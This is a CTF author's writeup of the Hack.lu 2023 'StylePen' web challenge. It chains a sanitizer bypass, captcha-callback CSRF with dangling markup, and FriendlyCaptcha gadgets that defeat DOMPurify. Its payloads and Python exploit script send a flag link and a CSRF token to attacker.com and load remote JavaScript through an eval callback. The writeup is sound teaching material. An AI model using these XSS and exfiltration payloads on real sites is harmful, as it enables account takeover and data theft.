Hacklu CTF 2023 — StylePen Writeup

Last weekend, my CTF team FluxFingers hosted our yearly Hack.lu CTF . I had a lot of fun preparing challenges and watching the participants find unique and unforeseen solutions to them. This year, I made two challenges:

Safest Eval, a misc Python Jail challenge. You can read an excellent writeup by rebane2001 about it.
StylePen, a web XSS challenge. You’re reading the writeup about it right now ;).

If you want to play any of my challenges before reading on, check out the challenges page !

The StylePen competition

StylePen (no affiliation with codepen.io) hosted a Spooktober CSS competition. On the site, you could submit a HTML / CSS snippet with a spooky animation to win. With the editor, you could directly edit the snippet and see the result on the page, after being sanitized by DOMPurify. The code was also synced with the URL hash. Before submitting, you had to solve a Proof of Work based JS Captcha, courtesy of FriendlyCaptcha . Captchas in XSS challenges with a Chrome bot usually protect the infra from melting down. But lateron, we will see that this captcha was actually at the center of this challenge. I expected a lot of players to miss this because of their previous XSS challenge experiences 😈.

After submission, a “rater” bot would view the rendered snippet on /view.php?id={randomid}. This page used a server-side custom sanitizer Cleaner.php. All pages except /index.php, so also this one, have a CSP with script-src 'self' 'wasm-unsafe-eval'. The rater bot also has an additional endpoint to send an arbitrary link to the admin bot. Only the admin bot had the permission to view the random ID of the flag.

Knowing the setup, we can can formulate a three step plan:

Submit HTML which bypasses Cleaner.php on /view.php
Use the HTML injection on /view.php to submit a link as the rater to /submit-admin.php to the admin bot
Send the admin bot to /index.php#{HTML} with HTML that bypasses DOMPurify and gets XSS as admin

1. Bypassing `Cleaner.php`

The server-side sanitizer Cleaner.php uses the DOMDocument::loadHTML() API of PHP. The docs page has an interesting warning about the API using HTML4 internally, which could lead to parsing differentials with browsers which use HTML5. Because I’m nice, no parsing differential or other complex bypass was needed: The sanitizer is just bad 🙃. Let’s look closer at the sanitize() function:

public function sanitize(string $dom_content, array $options = []): string
{
  // ... [1]
  $document = $this->loadDocument($dom_content);
  // ... [2]
  for ($i = $elements->length; --$i >= 0;) {
    $element = $elements->item($i);
    $tag_name = $element->tagName;
    if (in_array(strtolower($tag_name), $tags)) {
      for ($j = $element->attributes->length; --$j >= 0;) {
        $attr_name = $element->attributes->item($j)->name;
        $attr_value = $element->attributes->item($j)->textContent;
        if ((!in_array(strtolower($attr_name), $attributes) && !$this->isSpecialCase($attr_name)) ||
          $this->isExternalUrl($attr_value)
        ) {
          $element->removeAttribute($attr_name);
        }
      }
    } else {
      $element->parentNode->removeChild($element);
    }
  }
  // [3]
  $output = $this->saveDocument($document);
  // [4]
  $output = $this->regexCleaning($output);
  if ($options['remove-html-tags']) {
    $output = preg_replace(self::HTML_TAGS, '', $output);
  }
  if ($options['remove-xml-tags']) {
    $output = preg_replace(self::XML_TAGS, '', $output);
  }
  // ...
  return trim($output);
}

The HTML string is parsed into a DOM with DOMDocument::loadHTML().
All tags / attributes in the DOM are checked against an allowlist.
The resulting DOM is stringified again.
The new HTML string is cleaned with additional regexs and returned as clean.

Regex cleaning performed on an HTML string is often buggy. So let’s take a look at all the regexs used at this stage:

const JAVASCRIPT_ATTR = "/(\s(?:href|xlink\:href)\s*=\s*\"javascript:.*\")/i";
const SNEAKY_ONLOAD = "/(\s(?:href|xlink\:href)\s*=\s*\"data:.*onload.*\")/i";
const HTML_TAGS = "~<(?:!DOCTYPE|/?(?:html|body))[^>]*>\s*~i";
const XML_TAGS = '/<\?xml.*\?>/i';

All regexs except HTML_TAGS contain .*. This can be used to delete boundaries between different contexts, like an HTML tags and an attribute, HTML and style, or HTML and HTML comment. A payload hidden inside a comment can be revealed here with the JAVASCRIPT_ATTR.

<!-- before regex: -->
a href="javascript: <!-- " <img src onerror=alert()> -->
<!-- after regex: -->
<img src onerror=alert()> -->

2. Submitting a link to admin bot

The view.php page with this injection has a CSP with script-src 'self' 'wasm-unsafe-eval';, so we have to get creative. Submitting an arbitrary link can only be done by the rater bot and requires a CSRF token. There’s an obvious approach that everyone took, and then there’s the intended solution that wasn’t required because I forgot to block the obvious (feel free to skip that part if you’re not interested).

The obvious approach: meta tag redirect

The (in hindsight) obvious approach that every solving team used is simply injecting a meta tag redirect to the /index.php page that does not have a CSP. This page accepts any HTML in the URL hash and renders it after DOMPurify sanitization. So just submit the last payload to the admin bot there, after bypassing DOMPurify (see step 3).

<meta http-equiv='refresh' content='0;/#<img src onerror="csrf=document.querySelector(`[name=csrf]`).value;
fetch(`/submit-admin.php`, {method: `POST`, 
body: `csrf=${csrf}&url=https://stylepen.flu.xxx/#${payload to steal flag}`})">'>

The intended solution: captcha and dangling markup

I wanted to write a challenge which required a scriptless attack but also has a page without CSP. I knew that people could bypass the scriptless attack by just using the showed meta redirect. That’s why I included two bots with different accounts, which in theory should have only had access to one injection page each. But while implementing the challenge a few days (and nights) before the CTF, I just forgot to check that. So let’s pretend for a moment that redirects to /index.php are blocked for the rater bot. What can still be done?

We can still live of the land: load existing scripts on the server and look for gadgets. The captcha I alluded to earlier is one of those gadgets. Just load the script and the captcha element can be loaded automatically by putting a div with specific attributes on the page.

<script src="/widget.module.min.js"></script>
<div class="frc-captcha" data-sitekey="FOOBAR">

After reading the docs of FriendlyCaptcha , we’ll find that this is more useful than it seems: The data-callback attribute can be used to specify a callback function that should run on a successfully solved captcha puzzle. The data-start="auto" attribute starts the captcha solving as soon as the captcha is loaded. And since the captcha task is a hash ProofOfWork and not a “click five red cars” task, this whole thing can be automated on the rater bot page. To ensure that the captcha runs correctly on the page, wasm-unsafe-eval is included in the CSP ;).

<script src="/widget.module.min.js"></script>
<div class="frc-captcha" data-sitekey="REALSITEKEY" data-start="auto" data-callback="alert">

Now we can call arbitrary functions on the page, but without control of the arguments. How is that useful? Coincidentally, app.js contains the sendSubmissionForm() function. This function submits the form with id submission-form if it contains a captcha-solution input. Combining this function with the captcha function call gadget, we can submit a form with the correct id on the page.

The existing form has the wrong id and url, but contains the CSRF token. To use it for our own POST request, we can use dangling markup injection . We can start our own form tag with the correct id and our payload url to be sent to the admin bot. At the end, we include an opened div with an attribute, that is opened with a single quote but never closed. Now all HTML after that, up to the next single quote, will be swallowed up into the attribute and not sent to the server. Note the convenient single quote in the button and how the url input is no longer in the form, but the csrf input is.

<form id="submission-form" method="POST" form-action="/submit-admin.php">
  <input name="url" value="https://stylepen.flu.xxx/#{payload to steal flag}">
  <div foo='

          </div>
        </div>
    </div>
</section>
<section>
    <div class="grid">
        <form method="POST" action="/submit_admin.php">
            <input type="hidden" name="url" value="https://stylepen.flu.xxx/view.php?id=f00">
            <button type="submit">Recommend contestant's submission</button>
            <input type="hidden" name="csrf" value="abcd1337">
        </form>
        <div></div>
    </div>
</section>

Combining this technique with the captcha form submission gadget, we get this step 2 payload:

<form id=submission-form action=/submit-admin.php method=POST>
  <div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div>
  <input name=url value=https://stylepen.flu.xxx/#payload>
  <script src=/static/widget.module.min.js></script>
  <script src=/static/app.js></script>
  <div class='

An alternative approach here that some teams used: Stealing the CSRF token to their own server that then shows a POST CSRF page to the bot. This works because of two nested forms will be merged by the parser and only the outer form will be used (and because same-site cookies aren’t activated ). This approach does not need the single quote dangling markup injection.

<form id=submission-form action=https://attacker.com/csrf method=POST>
  <div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div>
  <script src=/static/widget.module.min.js></script>
  <script src=/static/app.js></script>
...
  <form method="POST" action="/submit_admin.php"> <!-- this form action is ignored -->
      <input type="hidden" name="url" value="https://stylepen.flu.xxx/view.php?id=f00">
      <button type="submit">Recommend contestant's submission</button>
      <input type="hidden" name="csrf" value="abcd1337"> <!-- stolen to attacker.com -->
  </form>

3. Bypassing DOMPurify

With steps 1 and 2, we can send the admin bot to /index.php, where there’s no CSP. But this page uses DOMPurify, a competent sanitizer. So we need a full script gadget here to be able to steal the flag which will execute our payload but isn’t filtered by DOMPurify. This is where the FriendlyCaptcha widget comes in (again). This captcha is loaded automatically on all elements with class="frc-captcha". And the data attributes of that element are used unsafely. We have to delve into the source code a bit, where we’ll find a plethora of gadgets. It was really cool to see the different gadgets found by the teams:

The FriendlyCaptcha widget is constructed with basic HTML string interpolation and assignment to innerHTML. This can be abused with several of the exposed data attributes. I used the data-solution-field-name attribute which get’s rendered directly on load of the captcha:

<div class="frc-captcha" data-solution-field-name='"><img src onerror=alert()>'></div>

I also saw someone using the data-puzzle-endpoint attribute, combined with data-start="auto". This will immediately try to load a puzzle from the specified API endpoint. If that fails, an error message containing the raw endpoint “URL” is displayed and leads to XSS:

<div class="frc-captcha" data-start="auto"
  data-puzzle-endpoint="<img src onerror=alert()>"></div>

But by far the coolest gadget was one not involving HTML templating. Readers of the intended solution section above already know the data-callback attribute: The function name specified in the attribute get’s called with the captcha solution as the first parameter. Interestingly, the solution includes the original challenge string from the captcha server. And with the data-puzzle-endpoint attribute, we can set the captcha server to our own server 🤔. Do you see where this is going? We can set eval() as the data-callback and our own server as the data-puzzle-endpoint. Our server will return a puzzle that contains JS and a real puzzle grabbed from the normal captcha, separated by a dot. The captcha internally splits by dots, so we can’t use dots in our JS payload, but that shouldn’t be a problem for you if you got this far.

<div class="frc-captcha" data-start="auto" data-callback="eval"
  data-puzzle-endpoint="https://attacker.com/puzzle"></div>

{"data": {"puzzle": "import('https://attacker\x2ecom/stealFlagJS')//.c9fbcfeb5187a9ae56ebc61acd12b6e4.ZTeuWWRQVe02S/WpAQwzegAAAAAAAAAAEjmV2KsP2Dk="}}

The final payload + conclusion

Combining all 3 steps, with some horrible URL encoding, we get this final payload. It uses the intended solution instead of meta redirect and exfils the ID of the flag to attacker.com:

a href="javascript: <!-- "<form id=submission-form action=/submit-admin.php method=POST><div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div><input name=url value=https://stylepen.flu.xxx/#%3Cdiv%20class%3D%22frc-captcha%22%20data-solution-field-name%3D%27%22%3E%3Cimg%20src%20onerror%3D%22%28async%20%28%29%20%3D%3E%20%7Blet%20res%20%3D%20await%20%28await%20fetch%28%60/admin.php%60%29%29.text%28%29%3Blet%20dom%20%3D%20new%20DOMParser%28%29.parseFromString%28res%2C%20%60text/html%60%29%3Blet%20link%20%3D%20dom.querySelector%28%60a%5Brole%3D%5Cx22button%5Cx22%5D%60%29%3Bfetch%28%60https%3A//attacker.com%3Fflag%3D%24%7Blink.href%7D%60%29%3B%7D%29%28%29%22%3E%27%3E%3C/div%3E%0A><script src=/static/widget.module.min.js></script><script src=/static/app.js></script><div class=' -->

The exploit script, a bit more readable:

from urllib.parse import quote

EXFIL_SERVER = "https://attacker.com"
ORIGIN = "https://stylepen.flu.xxx"

first = """a href="javascript: <!-- "<form id=submission-form action=/submit-admin.php method=POST><div class=frc-captcha data-sitekey=FCMV995O03V7RIMQ data-callback=sendSubmissionForm data-start=auto data-solution-field-name=captcha-solution></div><input name=url value=SECOND><script src=/static/widget.module.min.js></script><script src=/static/app.js></script><div class=' -->"""
second = """<div class="frc-captcha" data-solution-field-name='"><img src onerror="THIRD">'></div>"""
third = """(async () => {
let res = await (await fetch(`/admin.php`)).text();
let dom = new DOMParser().parseFromString(res, `text/html`);
let link = dom.querySelector(`a[role=\x22button\x22]`);
fetch(`EXFIL_SERVER?flag=${link.href}`);
})()"""
third = third.replace("EXFIL_SERVER", EXFIL_SERVER)
second = second.replace("THIRD", third.replace("\n", ""))
payload = first.replace("SECOND", f"{ORIGIN}/#{quote(second)}")

print("Submit payload manually because of captcha and receive flag link at your server\n")
print(payload)

I hope you had fun playing and / or learned something new while reading this, same as I had fun and learned more reading your exploits in the DB logs 😁. See you next year for Hack.lu CTF 2024!